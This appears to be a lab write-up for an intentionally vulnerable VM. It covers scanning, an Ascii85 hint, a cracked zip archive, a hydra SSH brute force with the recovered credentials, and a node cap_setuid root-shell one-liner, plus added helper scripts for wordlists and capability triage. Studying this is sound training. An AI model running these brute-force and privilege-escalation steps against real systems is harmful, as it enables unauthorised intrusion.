OSCP Lab
Lab overview
Machine | Difficulty | Techniques
superhuman | easy | web fuzzing, Ascii85 decoding, zip password cracking, hydra SSH brute force, hijacked shell command (busybox workaround), getcap / node cap_setuid privilege escalation
Information gathering
Host discovery
nmap -sn 192.168.1.0/24
Port scan
┌──(root㉿kali)-[~]
└─# nmap -sV -A -p- -T4 192.168.1.41
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-20 04:04 EST
Nmap scan report for 192.168.1.41
Host is up (0.00066s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 9e:41:5a:43:d8:b3:31:18:0f:2e:32:36:cf:68:c4:b7 (RSA)
| 256 6f:24:81:b4:3d:e5:b9:c8:47:bf:b2:8b:bf:41:2d:51 (ECDSA)
|_ 256 49:5f:c0:7a:42:20:76:76:d5:29:1a:65:bf:87:d2:24 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:A6:FD:8E (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.66 ms 192.168.1.41
Directory scan
The web root is blank apart from the sentence "If your eye was sharper, you would see everything in motion, lol" and a picture of Nietzsche.
The image turned out to be password-protected, but brute-forcing the password failed.
└─# gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.1.41 -x html,php,txt -e
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.41
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php,txt,html
[+] Expanded: true
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
http://192.168.1.41/.html (Status: 403) [Size: 277]
http://192.168.1.41/index.html (Status: 200) [Size: 658]
http://192.168.1.41/.html (Status: 403) [Size: 277]
http://192.168.1.41/server-status (Status: 403) [Size: 277]
Progress: 882240 / 882244 (100.00%)
===============================================================
Finished
===============================================================
Switching to a larger wordlist and rescanning turned up a note file containing a block of Ascii85-encoded data. Identifying the encoding and decoding it:
gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt -u http://192.168.1.41/ -x html,php,txt -e
https://www.dcode.fr/cipher-identifier
https://www.dcode.fr/ascii-85-encoding
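The two dcode pages above do the identification and decoding in a browser. The following is an added example, not code from the original write-up, that does both with POSIX tr/sed/awk only, which matters on a target with no python: a charset-based identifier (the same heuristic dcode applies) and an Adobe Ascii85 decoder that handles the <~ ~> wrapper, whitespace, the z shorthand for four zero bytes and a trailing partial group. The sample blob is constructed for the demo; the note found on the box is not reproduced here.

```shell
#!/bin/sh
# Added example, not part of the original write-up: charset-based encoding
# identifier plus an Adobe Ascii85 decoder built from POSIX tools only.
# SAMPLE_BLOB is a constructed demo value, not the note from the box.

# guess_encoding: stdin -> hex | base32 | base64 | ascii85 | unknown
# Checks run from most to least restrictive alphabet, so a hex string that
# is also valid base64 and Ascii85 is reported as hex: a best guess only.
guess_encoding() {
    s=$(tr -d ' \t\r\n')
    if   printf '%s' "$s" | LC_ALL=C grep -Eq '^([0-9a-fA-F]{2})+$';    then echo hex
    elif printf '%s' "$s" | LC_ALL=C grep -Eq '^[A-Z2-7]+={0,6}$';       then echo base32
    elif printf '%s' "$s" | LC_ALL=C grep -Eq '^[A-Za-z0-9+/]+={0,2}$';  then echo base64
    elif printf '%s' "$s" | LC_ALL=C grep -Eq '^(<~)?[!-uz]+(~>)?$';     then echo ascii85
    else echo unknown
    fi
}

# a85decode: stdin Ascii85 (whitespace and the <~ ~> wrapper allowed)
# -> raw bytes on stdout. Exit 1 on an invalid character, a 1-char
# trailing group, or a group whose value exceeds 32 bits.
a85decode() {
    tr -d ' \t\r\n' | sed 's/^<~//; s/~>$//' | LC_ALL=C awk '
    function emit(x, count,    k) {
        if (x > 4294967295) { print "Ascii85 group out of range" > "/dev/stderr"; err = 1; exit 1 }
        for (k = 1; k <= count; k++) printf "%c", int(x / (256 ^ (4 - k))) % 256
    }
    BEGIN { for (i = 33; i <= 117; i++) val[sprintf("%c", i)] = i - 33; n = 0; v = 0 }
    {
        for (i = 1; i <= length($0); i++) {
            c = substr($0, i, 1)
            if (c == "z" && n == 0) { emit(0, 4); continue }      # z = four zero bytes
            if (!(c in val)) { print "invalid Ascii85 character: " c > "/dev/stderr"; err = 1; exit 1 }
            v = v * 85 + val[c]
            if (++n == 5) { emit(v, 4); v = 0; n = 0 }           # 5 chars -> 4 bytes
        }
    }
    END {
        if (err) exit 1
        if (n == 1) { print "truncated Ascii85 group" > "/dev/stderr"; exit 1 }
        if (n > 1) {                   # final partial group: pad with u, emit n-1 bytes
            k = n - 1
            for (; n < 5; n++) v = v * 85 + 84
            emit(v, k)
        }
    }'
}

# Demo on a constructed sample (decodes to "Hello World!").
SAMPLE_BLOB='<~87cURD]i,"Ebo80~>'
printf '%s' "$SAMPLE_BLOB" | guess_encoding
printf '%s' "$SAMPLE_BLOB" | a85decode
echo
```

On the box the same pipeline is `curl -s http://TARGET/note.txt | a85decode`; the decoder writes raw bytes, so pipe through `od -c` if the note turns out not to be text.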
Following the hint in the decoded note, fuzz the keyword salome_and_?? together with a file extension; could it be an archive?
ffuf -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.1.41/salome_and_FUZZ.zip
The guess was right: it really is a zip archive.
Annoyingly it is password-protected as well; cracking it with john (zip2john to extract the hash, then john against that hash) recovered the archive password.
At that point I wanted to swear: the archive holds a poem?
Initial access
Using the words of the poem as hints, build a wordlist and brute-force SSH with it to get a foothold. The same list serves as both the username and the password list (hydra -L and -P below).
┌──(root㉿kali)-[~]
└─# hydra -L user.txt -P user.txt ssh://192.168.1.41
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-02-20 04:49:38
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 81 login tries (l:9/p:9), ~6 tries per task
[DATA] attacking ssh://192.168.1.41:22/
[22][ssh] host: 192.168.1.41 login: fred password: schopenhauer
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-02-20 04:50:01
┌──(root㉿kali)-[~]
└─# cat user.txt
salome
fred
asshole
schopenhauer
lonely
scared
lady
baby
darling
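The user.txt above was built by hand from the poem. The following is an added example, not code from the original write-up, that automates the same idea: extract unique words from hint text, keep them in order of first appearance, and add a few cheap variants. The verse in SAMPLE_HINT is constructed for the demo; the poem from the archive is not reproduced here.

```shell
#!/bin/sh
# Added example, not part of the original write-up: derive a target-specific
# candidate list from hint text and add a few cheap variants for hydra.
# SAMPLE_HINT is a constructed sample, not the poem from the archive.

# hint_words: stdin free text -> unique lowercase words of 3+ letters,
# kept in order of first appearance so early hints are tried first.
hint_words() {
    LC_ALL=C tr -cs 'A-Za-z' '\n' | LC_ALL=C tr 'A-Z' 'a-z' | awk 'length($0) >= 3 && !seen[$0]++'
}

# mangle: stdin words -> word, Capitalised, UPPER and word123, deduplicated.
# Keep the variant set small: hydra -L list -P list tries every pair, so
# the run grows with the square of the list length.
mangle() {
    awk '{
        w = $0
        print w
        print toupper(substr(w, 1, 1)) substr(w, 2)
        print toupper(w)
        print w "123"
    }' | awk '!seen[$0]++'
}

# Constructed sample hint text (not the lab poem).
SAMPLE_HINT='Fred, lonely and scared, said: hello, HELLO, my darling Fred!'

# build_wordlist: prints the candidate list; redirect it to a file for hydra.
build_wordlist() {
    printf '%s\n' "$SAMPLE_HINT" | hint_words | mangle
}

build_wordlist
```

Feed the output to hydra as both -L and -P, add -t 4 as hydra's own warning above suggests, and -e nsr so hydra also tries an empty password, the username itself and the username reversed without those having to be in the list.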
Strangely, running ls simply terminates the session. The command has probably been replaced or trapped.
One option is to fetch an ls from the same OS version and swap it in, but we lack the permissions for that, so downloading a static busybox and using its ls is the simple route. Before doing that, "type ls" and "alias" show whether the trap is a shell alias or function (which \ls, command ls, or a shell started with bash --norc bypasses) or the on-disk binary itself, which only an independent binary such as busybox gets around.
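The following is an added example, not code from the original write-up, of the checks behind that decision: it classifies how a command name resolves in the current shell (alias, function, builtin, file on PATH), inspects the first bytes of the resolved file to tell a script wrapper from a real ELF binary, and lists a directory using only globbing and printf so no external ls is needed at all. The simulated trap in the demo only prints a message; the assumption is that the lab trap is an alias, function or replaced binary reachable by name, which is what the checks distinguish.

```shell
#!/bin/sh
# Added example, not part of the original write-up: find out how a command
# name like "ls" is being intercepted before trusting it, then list a
# directory with shell builtins only (no external ls, no busybox needed).

# classify_cmd NAME -> alias | function | builtin | file | missing
# Aliases and functions hide in ~/.bashrc, /etc/bash.bashrc or /etc/profile.d;
# "file" means PATH lookup itself returns a (possibly replaced) binary.
classify_cmd() {
    if alias "$1" >/dev/null 2>&1; then
        echo alias
        return 0
    fi
    case "$(command -V "$1" 2>/dev/null)" in
        *" function"*) echo function ;;
        *" builtin"*)  echo builtin ;;
        *) if p=$(command -v "$1" 2>/dev/null) && [ -f "$p" ]; then
               echo file
           else
               echo missing
           fi ;;
    esac
}

# file_kind PATH -> elf | script | other, from the first four bytes.
# A coreutils ls must be an ELF binary; a script in its place is a wrapper.
file_kind() {
    case "$(head -c 4 "$1" 2>/dev/null | LC_ALL=C od -An -c | tr -d ' \n')" in
        177ELF) echo elf ;;
        '#!'*)  echo script ;;
        *)      echo other ;;
    esac
}

# safe_list DIR -> entries one per line, dotfiles included, using only
# globbing and printf, so a trapped ls never runs.
safe_list() {
    for f in "$1"/* "$1"/.[!.]* "$1"/..?*; do
        [ -e "$f" ] || [ -L "$f" ] || continue    # skip unmatched patterns
        printf '%s\n' "${f##*/}"
    done
}

# Demo in a subshell so the simulated trap does not leak into your session.
(
    real=$(command -v ls)            # resolve the PATH binary before installing the trap
    ls() { echo "trap fired"; }      # stand-in for the lab trap that ends the session
    echo "ls now resolves as: $(classify_cmd ls)"
    echo "cd resolves as: $(classify_cmd cd)"
    echo "$real is $(file_kind "$real")"
    echo "listing . without ls:"
    safe_list .
)
```

On a Debian target the file case has one more check worth running by hand: dpkg -V coreutils reports any package file whose checksum no longer matches, which is exactly what a swapped /bin/ls looks like.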
Privilege escalation
fred@superhuman:~$ getcap
-bash: getcap: command not found
fred@superhuman:~$ which getcap
fred@superhuman:~$ find / -type f -name getcap 2>/dev/null
/usr/sbin/getcap
fred@superhuman:~$ /usr/sbin/getcap
usage: getcap [-v] [-r] [-h] <filename> [<filename> ...]
displays the capabilities on the queried file(s).
fred@superhuman:~$ /usr/sbin/getcap -r / 2>/dev/null
/usr/bin/ping = cap_net_raw+ep
/usr/bin/node = cap_setuid+ep
fred@superhuman:~$
https://gtfobins.github.io/#node
The "command not found" above is only a PATH issue: getcap lives in /usr/sbin, which is not on an unprivileged user's PATH on Debian, so it has to be called by full path. node carries cap_setuid+ep, meaning CAP_SETUID is in its permitted and effective sets, so process.setuid(0) succeeds for any user who can run it. Per GTFOBins, the following command spawns a root shell:
/usr/bin/node -e 'process.setuid(0); require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]})'
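getcap -r / lists every file capability, and most of them (ping's cap_net_raw, for instance) are not a path to root. The following is an added example, not code from the original write-up, that triages that output: it parses both the older "path = caps+ep" format shown above and the newer "path caps=ep" format, and flags capabilities that are root-equivalent on their own. The sample input reuses the two lines from the box plus one constructed line in the newer format; the path /usr/local/bin/example is invented for the demo.

```shell
#!/bin/sh
# Added example, not part of the original write-up: triage getcap -r output
# so root-equivalent capabilities stand out. Handles both libcap formats.
# Paths containing spaces are not handled (field splitting on whitespace).

# audit_caps: stdin getcap output -> "path<TAB>caps<TAB>class" per line.
# class: privesc (a capability that alone yields root), network, or info.
audit_caps() {
    LC_ALL=C awk '
    NF >= 2 {
        path = $1
        caps = ($2 == "=") ? $3 : $2        # "path = caps+ep" (old) vs "path caps=ep" (new)
        sub(/[+=][a-z]*$/, "", caps)        # strip the +ep / =ep flag suffix
        class = "info"
        n = split(caps, list, ",")
        for (i = 1; i <= n; i++) {
            if (list[i] ~ /^cap_(setuid|setgid|setfcap|chown|fowner|dac_override|dac_read_search|sys_admin|sys_ptrace|sys_module|sys_rawio)$/)
                class = "privesc"
            else if (list[i] ~ /^cap_net_(raw|admin|bind_service)$/ && class != "privesc")
                class = "network"
        }
        printf "%s\t%s\t%s\n", path, caps, class
    }'
}

# privesc_caps: stdin getcap output -> only paths carrying a root-equivalent cap
privesc_caps() {
    audit_caps | awk -F '\t' '$3 == "privesc" { print $1 }'
}

# Sample input: the two lines from the box plus one constructed line in the
# newer output format (the path /usr/local/bin/example is invented).
SAMPLE_GETCAP='/usr/bin/ping = cap_net_raw+ep
/usr/bin/node = cap_setuid+ep
/usr/local/bin/example cap_dac_read_search,cap_net_bind_service=ep'

printf '%s\n' "$SAMPLE_GETCAP" | audit_caps
echo "candidates for privilege escalation:"
printf '%s\n' "$SAMPLE_GETCAP" | privesc_caps
```

On the target this is `/usr/sbin/getcap -r / 2>/dev/null | privesc_caps`; each flagged binary then gets looked up on GTFOBins, as node was above. Verify the result of the node one-liner with id inside the spawned shell: setuid(0) changes the real, effective and saved uid, so it should report uid=0.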
Originally published on the WeChat public account 贝雷帽SEC: 【OSCP】superhuman